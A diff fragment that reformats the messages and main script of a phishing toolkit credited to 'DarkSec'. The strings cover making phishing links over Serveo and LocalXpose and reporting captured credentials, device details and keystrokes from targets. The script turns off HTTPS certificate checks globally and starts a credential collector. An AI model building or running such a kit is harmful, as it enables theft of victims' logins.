default_palette[3]),
|
||||
"failed_to_get_domain":
|
||||
_("\n{0}FAILED TO GET THIS DOMAIN.").format(default_palette[0]),
|
||||
"suggestion_to_fix_issue":
|
||||
_("\n{0}CUSTOM URL MAY BE NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE."
|
||||
).format(default_palette[0]),
|
||||
"you_can_try_to_select_other_domain":
|
||||
_("\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK)...").
|
||||
format(default_palette[0], default_palette[4]),
|
||||
"serveo_url_option_selection":
|
||||
_("\n{0}[ SERVEO URL TYPE SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_phishing_warning":
|
||||
_("\n{0}[{1}!{0}]{1}Serveo Drops The Connection Whenever Detects Phishing. Be careful."
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"choose_type_of_url":
|
||||
_("\n{0}[{1}*{0}]{0}CHOOSE SERVEO URL TYPE TO GENERATE PHISHING LINK:{1}"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"url_types": [
|
||||
["{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url)"],
|
||||
["{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)"],
|
||||
],
|
||||
"serveo_is_down": _(
|
||||
"{0}[{1}1{0}]Serveo is {1}DOWN{0} now, do you want to select another option? {1}Y{0}/{1}n{0}"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_is_down":
|
||||
_("{0}[{1}1{0}]Serveo is {1}DOWN{0} now, do you want to select another option? {1}Y{0}/{1}n{0}"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
}
|
||||
|
||||
lang_start_localxpose = {
|
||||
"localxpose_random_server": _(
|
||||
"\n{0}[ RANDOM LOCALXPOSE URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2])
|
||||
"localxpose_random_server":
|
||||
_("\n{0}[ RANDOM LOCALXPOSE URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2])
|
||||
}
|
||||
|
|
|
@ -9,128 +9,128 @@ from Defs.LocalizationManager.localization import _
|
|||
|
||||
default_palette = theme.default_palette
|
||||
|
||||
|
||||
text_to_confirm_license = _("Yes, i do")
|
||||
|
||||
write_eula = _(
|
||||
"""
|
||||
write_eula = _("""
|
||||
# To Accept EULA set eula to True
|
||||
# Don't accept EULA if you didn't read LICENSE
|
||||
|
||||
"""
|
||||
)
|
||||
""")
|
||||
|
||||
lang_check_php = {
|
||||
"found": _("\n {0}[{1}*{0}] PHP has been found. Proceeding.").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"not-found": _(
|
||||
"\n {0}[{1}*{0}] Unable to find PHP, please install PHP and try again."
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"found":
|
||||
_("\n {0}[{1}*{0}] PHP has been found. Proceeding.").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"not-found":
|
||||
_("\n {0}[{1}*{0}] Unable to find PHP, please install PHP and try again.").
|
||||
format(default_palette[0], default_palette[2]),
|
||||
}
|
||||
|
||||
lang_check_permissions = {
|
||||
"permissions_granted": _("{0}Permissions granted!").format(default_palette[0]),
|
||||
"permissions_denied": _("{0}Permissions denied! Please run as {1}sudo{0}").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"windows_warning": _(
|
||||
"\n{0}[{1}!{0}] {1}Windows systems {0}aren't compatible yet. Make sure you're using a {1}Linux/GNU{0} system."
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"permissions_granted":
|
||||
_("{0}Permissions granted!").format(default_palette[0]),
|
||||
"permissions_denied":
|
||||
_("{0}Permissions denied! Please run as {1}sudo{0}").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"windows_warning":
|
||||
_("\n{0}[{1}!{0}] {1}Windows systems {0}aren't compatible yet. Make sure you're using a {1}Linux/GNU{0} system."
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
}
|
||||
|
||||
lang_verify_connection = {
|
||||
"connected": _("\n {0}[{1}*{0}] INTERNET - {1}[CONNECTED]").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"disconnected": _("\n {0}[{1}*{0}] INTERNET - {1}[DISCONNECTED]").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"verify_your_connection": _(
|
||||
"\n{0}[{1}!{0}] Network error. Please verify your internet connection."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"connected":
|
||||
_("\n {0}[{1}*{0}] INTERNET - {1}[CONNECTED]").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"disconnected":
|
||||
_("\n {0}[{1}*{0}] INTERNET - {1}[DISCONNECTED]").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"verify_your_connection":
|
||||
_("\n{0}[{1}!{0}] Network error. Please verify your internet connection.").
|
||||
format(default_palette[2], default_palette[0]),
|
||||
}
|
||||
|
||||
lang_module_loading_message = {
|
||||
"is_loaded": _("{0} IS LOADED...{0}\n--------------------------------").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"select_any_mode": _(
|
||||
"\n {0}[{1}*{0}] SELECT ANY MODE...{0}\n--------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"is_loaded":
|
||||
_("{0} IS LOADED...{0}\n--------------------------------").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"select_any_mode":
|
||||
_("\n {0}[{1}*{0}] SELECT ANY MODE...{0}\n--------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
}
|
||||
|
||||
lang_get_ip_addr = {"unable_to_get_ip": "Unable to get Hostname and IP"}
|
||||
|
||||
lang_port_selector = {
|
||||
"website_port_selection": _(
|
||||
"\n{0}[ WEBSERVER PORT SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"select_any_available_port": _("\n {0}[{1}*{0}]Select Port [1-65535]:{1}").format(
|
||||
default_palette[0], default_palette[4]
|
||||
),
|
||||
"port_suggestion": _(
|
||||
"\n {0}[{1}*{0} We suggest using ports between [{1}1024{0}-{1}65535{0}] but you still able to choose any ports you want."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"website_port_selection":
|
||||
_("\n{0}[ WEBSERVER PORT SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"select_any_available_port":
|
||||
_("\n {0}[{1}*{0}]Select Port [1-65535]:{1}").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"port_suggestion":
|
||||
_("\n {0}[{1}*{0} We suggest using ports between [{1}1024{0}-{1}65535{0}] but you still able to choose any ports you want."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
}
|
||||
|
||||
lang_exit_message = {
|
||||
"choice": _(
|
||||
"\n{0}[{1}?{0}] Re-run(r) : Exit(x) : Send Email(m) : SelectServer(s)\n\n >> {2}"
|
||||
).format(default_palette[0], default_palette[4], default_palette[2]),
|
||||
"help_to_improve_this_tool": _(
|
||||
"{1} [[*]] {0}You always can help to improve this tool and support us. {0}"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"tell_if_page_got_broken": _(
|
||||
"{0}[{1}!{0}] If any phishing page got broken, please let us know."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"make_your_pull_request_or_issue": _(
|
||||
"{0}[{1}!{0}] You can create issue or pull request on our GitHub page."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"small_disclaimer_suggestion": _(
|
||||
"{0}[{1}!{0}] We are not responsible for anything you do with this tool, please review license agreement when you have some time. \n{0}[{1}!{0}] We know everyone skips it and just agrees, but please, don't act so irresponsible with any software you use."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"forum_suggestion": _(
|
||||
"{0}[{1}!{0}] Our website has forum, please visit it, we want to build great community for all of you, we are always happy to have your help."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"financial_support": _(
|
||||
"{0}[{1}!{0}] If you want to support us with finances - visit our patreon page: (here_will_be_link_soon)"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"thank_you": _(
|
||||
"{0}[{1}!{0}] You help us even when you just use this tool. Everyone at {1}DarkSec{0} happy to have you, thank you very much! Have a nice day!"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"choice":
|
||||
_("\n{0}[{1}?{0}] Re-run(r) : Exit(x) : Send Email(m) : SelectServer(s)\n\n >> {2}"
|
||||
).format(default_palette[0], default_palette[4], default_palette[2]),
|
||||
"help_to_improve_this_tool":
|
||||
_("{1} [[*]] {0}You always can help to improve this tool and support us. {0}"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"tell_if_page_got_broken":
|
||||
_("{0}[{1}!{0}] If any phishing page got broken, please let us know."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"make_your_pull_request_or_issue":
|
||||
_("{0}[{1}!{0}] You can create issue or pull request on our GitHub page.").
|
||||
format(default_palette[2], default_palette[0]),
|
||||
"small_disclaimer_suggestion":
|
||||
_("{0}[{1}!{0}] We are not responsible for anything you do with this tool, please review license agreement when you have some time. \n{0}[{1}!{0}] We know everyone skips it and just agrees, but please, don't act so irresponsible with any software you use."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"forum_suggestion":
|
||||
_("{0}[{1}!{0}] Our website has forum, please visit it, we want to build great community for all of you, we are always happy to have your help."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"financial_support":
|
||||
_("{0}[{1}!{0}] If you want to support us with finances - visit our patreon page: (here_will_be_link_soon)"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"thank_you":
|
||||
_("{0}[{1}!{0}] You help us even when you just use this tool. Everyone at {1}DarkSec{0} happy to have you, thank you very much! Have a nice day!"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
}
|
||||
|
||||
lang_credentials_collector = {
|
||||
"waiting_for_interaction": _(
|
||||
"{0}[{1}*{0}]{1} Waiting For Target Interaction. Keep Eyes On Requests Coming From Target ... \n{2}________________________________________________________________________________\n"
|
||||
).format(default_palette[0], default_palette[2], default_palette[4]),
|
||||
"credentials_found": _("\n {0}[{1} CREDENTIALS FOUND {0}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]
|
||||
),
|
||||
"device_details_found": _("\n {0}[{1} DEVICE DETAILS FOUND {0}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]
|
||||
),
|
||||
"getting_pressed_keys": _("\n {1}[{0} GETTING PRESSED KEYS {1}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]
|
||||
),
|
||||
"waiting_for_interaction":
|
||||
_("{0}[{1}*{0}]{1} Waiting For Target Interaction. Keep Eyes On Requests Coming From Target ... \n{2}________________________________________________________________________________\n"
|
||||
).format(default_palette[0], default_palette[2], default_palette[4]),
|
||||
"credentials_found":
|
||||
_("\n {0}[{1} CREDENTIALS FOUND {0}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]),
|
||||
"device_details_found":
|
||||
_("\n {0}[{1} DEVICE DETAILS FOUND {0}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]),
|
||||
"getting_pressed_keys":
|
||||
_("\n {1}[{0} GETTING PRESSED KEYS {1}]{1}:\n").format(
|
||||
default_palette[2], default_palette[3]),
|
||||
}
|
||||
|
||||
lang_terms_of_service_message = {
|
||||
"great_power_great_responsibility": _(
|
||||
" {0}WITH GREAT POWER {1}- {0}COMES GREAT RESPONSIBILITY "
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"do_you_accept_license": _("{0}Do you accept {1}license{0}?").format(
|
||||
default_palette[2], default_palette[0]
|
||||
),
|
||||
"enter_this_to_confirm": _("{0}Enter: {1}{text_to_confirm}{0} to confirm.").format(
|
||||
default_palette[2], default_palette[0], text_to_confirm=text_to_confirm_license
|
||||
),
|
||||
"you_are_not_allowed": _(
|
||||
"{0}You are {1}not allowed {0}to use this app without accepting license."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"GPL_3.0": _(
|
||||
"""
|
||||
"great_power_great_responsibility":
|
||||
_(" {0}WITH GREAT POWER {1}- {0}COMES GREAT RESPONSIBILITY "
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"do_you_accept_license":
|
||||
_("{0}Do you accept {1}license{0}?").format(default_palette[2],
|
||||
default_palette[0]),
|
||||
"enter_this_to_confirm":
|
||||
_("{0}Enter: {1}{text_to_confirm}{0} to confirm.").format(
|
||||
default_palette[2],
|
||||
default_palette[0],
|
||||
text_to_confirm=text_to_confirm_license),
|
||||
"you_are_not_allowed":
|
||||
_("{0}You are {1}not allowed {0}to use this app without accepting license."
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"GPL_3.0":
|
||||
_("""
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
|
@ -805,6 +805,5 @@ may consider it more useful to permit linking proprietary applications with
|
|||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
||||
"""
|
||||
),
|
||||
"""),
|
||||
}
|
||||
|
|
|
@ -23,8 +23,7 @@ if not agreement:
|
|||
exit()
|
||||
|
||||
if not environ.get("PYTHONHTTPSVERIFY", "") and getattr(
|
||||
ssl, "_create_unverified_context", None
|
||||
):
|
||||
ssl, "_create_unverified_context", None):
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
|
||||
|
||||
simple_informant.check_permissions()
|
||||
|
@ -50,7 +49,8 @@ if __name__ == "__main__":
|
|||
server_runner.start_server(port)
|
||||
server_runner.server_selection(port)
|
||||
|
||||
multiprocessing.Process(target=server_runner.start_server, args=(port,)).start()
|
||||
multiprocessing.Process(target=server_runner.start_server,
|
||||
args=(port, )).start()
|
||||
simple_informant.credentials_collector()
|
||||
|
||||
except KeyboardInterrupt:
|
||||
|
|
Loading…
Reference in New Issue
Block a user